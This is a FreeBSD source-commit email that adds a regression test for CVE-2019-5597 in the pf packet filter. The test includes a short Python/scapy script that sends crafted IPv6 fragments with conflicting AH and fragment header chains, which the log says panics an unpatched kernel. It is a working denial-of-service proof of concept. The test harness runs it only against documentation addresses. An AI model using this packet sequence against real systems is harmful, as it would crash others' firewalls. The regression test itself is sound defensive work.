svn commit: r344692 - head/tests/sys/netpfil/pf
Kristof Provost
kp at FreeBSD.org
Fri Mar 1 07:39:57 UTC 2019
Author: kp
Date: Fri Mar 1 07:39:55 2019
New Revision: 344692
URL: https://svnweb.freebsd.org/changeset/base/344692
Log:
pf tests: Test CVE-2019-5597
Generate a fragmented packet with different header chains, to provoke
the incorrect behaviour of pf.
Without the fix this will trigger a panic.
Obtained from: Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv
Added:
head/tests/sys/netpfil/pf/CVE-2019-5597.py (contents, props changed)
Modified:
head/tests/sys/netpfil/pf/Makefile
head/tests/sys/netpfil/pf/fragmentation.sh
Added: head/tests/sys/netpfil/pf/CVE-2019-5597.py
==============================================================================
--- /dev/null 00:00:00 1970 (empty, because file is newly added)
+++ head/tests/sys/netpfil/pf/CVE-2019-5597.py Fri Mar 1 07:39:55 2019 (r344692)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO = 17
+AH_PROTO = 51
+FRAG_PROTO = 44
+
+def main():
+ intf = sys.argv[1]
+ ipv6_src = sys.argv[2]
+ ipv6_dst = sys.argv[3]
+
+ ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+ padding = 8
+ fid = random.randint(0,100000)
+ frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+ frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+
+ pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+ / sp.Raw('XXXX' * 199) \
+ / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+ / frag_1
+
+ pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+ pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+ sp.sendp(pkt0, iface=intf, verbose=False)
+ sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+ main()
Modified: head/tests/sys/netpfil/pf/Makefile
==============================================================================
--- head/tests/sys/netpfil/pf/Makefile Fri Mar 1 07:37:45 2019 (r344691)
+++ head/tests/sys/netpfil/pf/Makefile Fri Mar 1 07:39:55 2019 (r344692)
@@ -20,8 +20,10 @@ ATF_TESTS_SH+= anchor \
${PACKAGE}FILES+= utils.subr \
echo_inetd.conf \
- pft_ping.py
+ pft_ping.py \
+ CVE-2019-5597.py
${PACKAGE}FILESMODE_pft_ping.py= 0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py= 0555
.include <bsd.test.mk>
Modified: head/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- head/tests/sys/netpfil/pf/fragmentation.sh Fri Mar 1 07:37:45 2019 (r344691)
+++ head/tests/sys/netpfil/pf/fragmentation.sh Fri Mar 1 07:39:55 2019 (r344692)
@@ -104,6 +104,11 @@ v6_body()
atf_check -s exit:0 -o ignore\
ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+ $(atf_get_srcdir)/CVE-2019-5597.py \
+ ${epair_send}a \
+ 2001:db8:42::1 \
+ 2001:db8:43::3
}
v6_cleanup()
More information about the svn-src-all
mailing list